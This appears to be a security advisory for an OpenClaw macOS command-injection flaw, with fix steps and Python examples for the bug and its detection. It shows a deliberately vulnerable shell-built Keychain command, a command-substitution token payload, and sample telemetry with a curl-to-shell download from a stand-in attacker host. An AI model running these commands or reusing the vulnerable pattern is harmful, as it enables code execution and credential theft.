CVE-2026-27487

7.6 HIGH

📋 TL;DR

OpenClaw versions 2026.2.13 and below on macOS are vulnerable to OS command injection when refreshing OAuth tokens stored in the macOS Keychain. An attacker who can influence a value used in that refresh can execute arbitrary commands with the privileges of the user running OpenClaw. All OpenClaw users on macOS running an affected version are impacted.
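The bug class described above, as an added illustration (this is not OpenClaw's code and does not claim to reproduce its token-refresh logic): a Keychain write built as a shell command string around the macOS security tool, next to two hardened forms. The account name, service name and token payload are made up. Running with tool="echo" swaps the real security binary for echo so the demonstration never touches a Keychain; on the vulnerable path the shell expands the $( ... ) in the token before the tool ever sees it.

```python
import shlex
import subprocess

# Added illustration, not OpenClaw's code. The vulnerable pattern is a shell
# command line built by string interpolation; the hardened forms either avoid
# the shell entirely (argv list, preferred) or shell-quote every value.
# Account/service names and the token payload are made up.


def build_shell_command(account, service, token, tool="security"):
    """VULNERABLE: the token is pasted into a string that a shell will parse."""
    return f"{tool} add-generic-password -U -a {account} -s {service} -w {token}"


def build_quoted_shell_command(account, service, token, tool="security"):
    """Safer if a shell is unavoidable: every value is individually quoted."""
    parts = [tool, "add-generic-password", "-U", "-a", account, "-s", service, "-w", token]
    return " ".join(shlex.quote(p) for p in parts)


def build_argv(account, service, token, tool="security"):
    """HARDENED: an argv list handed straight to exec; no shell ever sees the token."""
    return [tool, "add-generic-password", "-U", "-a", account, "-s", service, "-w", token]


def run_vulnerable(account, service, token, tool="security"):
    cmd = build_shell_command(account, service, token, tool)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_quoted(account, service, token, tool="security"):
    cmd = build_quoted_shell_command(account, service, token, tool)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_hardened(account, service, token, tool="security"):
    argv = build_argv(account, service, token, tool)
    return subprocess.run(argv, capture_output=True, text=True).stdout


# A token value carrying a command substitution (made-up payload). The shell
# expands $(...) to "INJECTED"; the hardened paths pass the text through literally.
INJECTED_TOKEN = "x$(printf %s%s INJ ECTED)"

if __name__ == "__main__":
    args = ("user@example.com", "openclaw-oauth", INJECTED_TOKEN)
    print("vulnerable:", run_vulnerable(*args, tool="echo").strip())
    print("quoted:    ", run_quoted(*args, tool="echo").strip())
    print("argv:      ", run_hardened(*args, tool="echo").strip())
```

The argv form is the fix to prefer: quoting only works as long as every call site remembers to quote, while an argument vector has no shell to confuse. The same applies whatever language the application is written in (exec-style APIs that take an argument array rather than a command string).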

💻 Affected Systems

Products:
  • OpenClaw
Versions: 2026.2.13 and below
Operating Systems: macOS
Default Config Vulnerable: ⚠️ Yes
Notes: Only macOS builds are affected, because the vulnerable code path is the macOS Keychain integration; OpenClaw on other operating systems is not affected.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise via arbitrary command execution, potentially leading to data theft, ransomware deployment, or persistent backdoor installation.

🟠

Likely Case

Arbitrary command execution as the logged-in macOS user (no escalation beyond that user's privileges), giving unauthorized access to the user's files and to credentials the user can read from the Keychain.

🟢

If Mitigated

Limited impact if the Keychain update is invoked without a shell (an argument vector rather than an interpolated command string) and token values are validated, so that only the intended security operation can run.

🌐 Internet-Facing: LOW
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: No
Weaponized: UNKNOWN
Unauthenticated Exploit: No
Complexity: LOW

Exploitation requires user interaction to trigger OAuth token refresh; no public exploits are known at this time.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 2026.2.14

Vendor Advisory: https://github.com/openclaw/openclaw/releases/tag/v2026.2.14

Restart Required: No

Instructions:

1. Update OpenClaw to version 2026.2.14 or later.
2. Verify the update by checking the installed version (openclaw --version).
3. No restart is required, but restarting the application is recommended so that an already-running process picks up the fixed code.

🔧 Temporary Workarounds

Disable OAuth Token Refresh (macOS)

Prevent the vulnerable credential refresh process from executing. Configuration change only; no command applies.

Use Alternative Authentication (macOS)

Switch to API keys or other authentication methods that don't use OAuth token refresh in Keychain. Configuration change only; no command applies.

🧯 If You Can't Patch

  • Restrict user permissions to limit potential damage from command execution.
  • Monitor system logs for unusual invocations of the macOS security command-line tool (/usr/bin/security) or unusual Keychain access patterns.

🔍 How to Verify

Check if Vulnerable:

Check OpenClaw version; if it's 2026.2.13 or below on macOS, it's vulnerable.

Check Version:

openclaw --version

Verify Fix Applied:

Confirm OpenClaw version is 2026.2.14 or later and test OAuth token refresh functionality.
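A version check that does the comparison numerically, as an added example (not an official OpenClaw tool). It assumes only that the output of openclaw --version contains a dotted MAJOR.MINOR.PATCH triple somewhere; the exact output format is not documented on this page. The numeric comparison matters because a plain string comparison gets CalVer wrong ("2026.2.9" sorts after "2026.2.14" as text).

```python
import re
import subprocess
import sys

# Added example, not an official OpenClaw tool. Assumes `openclaw --version`
# prints something containing a dotted MAJOR.MINOR.PATCH triple.
FIXED_VERSION = (2026, 2, 14)
VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")


def parse_version(version_output):
    """Extract the first X.Y.Z triple from the tool's output as a tuple of ints."""
    match = VERSION_RE.search(version_output)
    if not match:
        raise ValueError(f"no version triple found in: {version_output!r}")
    return tuple(int(part) for part in match.groups())


def is_vulnerable(version_output, platform=sys.platform):
    """True only on macOS (sys.platform == 'darwin') with a version below the fix."""
    return platform == "darwin" and parse_version(version_output) < FIXED_VERSION


if __name__ == "__main__":
    out = subprocess.run(["openclaw", "--version"], capture_output=True, text=True).stdout
    print("vulnerable" if is_vulnerable(out) else "not vulnerable", "-", out.strip())
```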

📡 Detection & Monitoring

Log Indicators:

  • Unusual invocations of the macOS security command-line tool (/usr/bin/security), in particular with arguments that contain shell separators or command substitution
  • Failed Keychain access attempts
  • Suspicious process spawns from OpenClaw

Network Indicators:

  • Unexpected outbound connections from OpenClaw process

SIEM Query:

process_name:"security" AND parent_process:"openclaw" AND command_line:"add-generic-password"
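The logic behind that query run over sample process-creation events, as an added example (not vendor or OpenClaw detection content). The event fields pid, ppid, process_name and command_line are assumed names; map them to whatever your EDR or unified-log export uses. The sample telemetry is constructed. The example goes one step further than the query above: if an application builds the Keychain update as a shell command, the parent of the security process is the shell rather than openclaw, and any injected command shows up as a sibling under that shell, so the detector walks the ancestor chain instead of matching the direct parent only.

```python
import json
import re

# Added example, not vendor detection content. Field names are assumed.
SHELLS = {"sh", "bash", "zsh"}
SHELL_META = re.compile(r"[;|&`]|\$\(")

# Constructed sample telemetry (not real logs). pid 101 is a normal refresh;
# pids 102-104 show a refresh routed through a shell with an injected command.
SAMPLE_EVENTS = """\
{"pid": 100, "ppid": 1, "process_name": "openclaw", "command_line": "openclaw gateway"}
{"pid": 101, "ppid": 100, "process_name": "security", "command_line": "security add-generic-password -U -a user@example.com -s openclaw-oauth -w tok_ok"}
{"pid": 102, "ppid": 100, "process_name": "sh", "command_line": "sh -c security add-generic-password -U -a user@example.com -s openclaw-oauth -w x; curl http://attacker.example/p | sh"}
{"pid": 103, "ppid": 102, "process_name": "security", "command_line": "security add-generic-password -U -a user@example.com -s openclaw-oauth -w x"}
{"pid": 104, "ppid": 102, "process_name": "curl", "command_line": "curl http://attacker.example/p"}
{"pid": 200, "ppid": 1, "process_name": "bash", "command_line": "bash -c ls; echo hi"}
"""


def parse_events(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def ancestor_names(event, by_pid):
    """Process names from the parent upward, following ppid links we have events for."""
    names, ppid, seen = [], event["ppid"], set()
    while ppid in by_pid and ppid not in seen:
        seen.add(ppid)
        parent = by_pid[ppid]
        names.append(parent["process_name"])
        ppid = parent["ppid"]
    return names


def detect(events):
    """Return (severity, pid, reason) findings for processes descending from openclaw."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for ev in events:
        chain = ancestor_names(ev, by_pid)
        if "openclaw" not in chain:
            continue  # only the openclaw process tree is in scope
        name, cmd = ev["process_name"], ev["command_line"]
        if name == "security" and "add-generic-password" in cmd:
            if chain[0] == "openclaw":
                findings.append(("info", ev["pid"], "keychain write spawned directly by openclaw"))
            else:
                findings.append(("high", ev["pid"], f"keychain write routed through {chain[0]}"))
        elif name in SHELLS and SHELL_META.search(cmd):
            findings.append(("high", ev["pid"], "shell under openclaw with command separators or substitution"))
        elif name != "security" and chain[0] in SHELLS:
            findings.append(("high", ev["pid"], f"unexpected process {name} spawned by a shell under openclaw"))
    return findings


if __name__ == "__main__":
    for severity, pid, reason in detect(parse_events(SAMPLE_EVENTS)):
        print(f"{severity:5} pid={pid} {reason}")
```

The direct openclaw to security spawn is reported at info level so you can baseline how often legitimate refreshes occur; the shell-routed write, the shell carrying separators, and the curl sibling are the ones worth alerting on. Whether the patched or unpatched build spawns through a shell is not stated on this page, so keep both the direct-parent query above and the ancestor-chain rule until you have confirmed the process tree on your own hosts.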

🔗 References
